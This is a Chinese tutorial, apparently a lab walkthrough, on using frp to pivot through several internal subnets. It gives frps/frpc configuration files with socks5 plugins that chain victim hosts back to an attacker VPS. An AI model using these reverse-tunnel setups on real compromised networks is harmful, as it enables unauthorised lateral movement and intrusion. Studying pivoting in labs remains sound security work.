frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。frp项目官网地址是:https://github.com/fatedier/frp/,下载解压后可以发现7个文件,frpc和frps分别为客户端和服务端可执行程序,frpc.ini和frps.ini,分别为客户端和服务端配置文件,frpc_full.ini和frps_full.ini分别为客户端所有配置项和服务端所有配置项。
frps:
[common]
bind_addr = 0.0.0.0 # 服务端监听地址
bind_port = 7000 # 服务端监听端口,默认7000
auth_token = xxxxxxxx # 验证凭据
frpc:
[common]
server_addr = x.x.x.x # 连接的服务器IP地址
server_port = 7000 # 连接的服务器端口
[http_proxy]
type = tcp # 连接类型为tcp
local_ip = x.x.x.x # 本地ip
local_port = 8888 # 本地监听端口
remote_port = 8888 # 远程服务器端口
use_encryption = true #启⽤加密
plugin = socks5 # 使⽤插件socks5代理
攻击机:
Vps:192.168.53.132
win10:192.168.53.129
受害机:
Debian:192.168.53.134 10.10.20.131
win7:10.10.20.129 10.10.30.130
win10:10.10.30.132 172.16.5.132
2008:172.16.5.129 172.16.10.128
kali攻击机启动frps监听,配置文件如下:
[common]
bind_addr = 0.0.0.0
bind_port = 7000
Debian启动frpc,配置文件如下:
[common]
server_addr = 192.168.53.132
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.20.131
remote_port = 8888
local_port = 8888
plugin = socks5
Debian(frpc):
[common]
server_addr = 192.168.53.132
server_port = 7000
[http_proxy]
type = tcp
remote_port = 8888
local_ip = 10.10.20.131
local_port = 8888
plugin = socks5
Debian(frps):
[common]
bind_addr = 10.10.20.131
bind_port = 7000
Win 7(frpc):
[common]
server_addr = 10.10.20.131
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.30.130
remote_port = 8888
local_port = 8888
plugin = socks5
kali和Debian配置不需要改动,Win7的frpc和frps配置参考上一条Debian配置,这边就不再次体现了,然后Win10的frpc配置参考上面的Win7的frpc配置
至此,所有主机全部都能登录。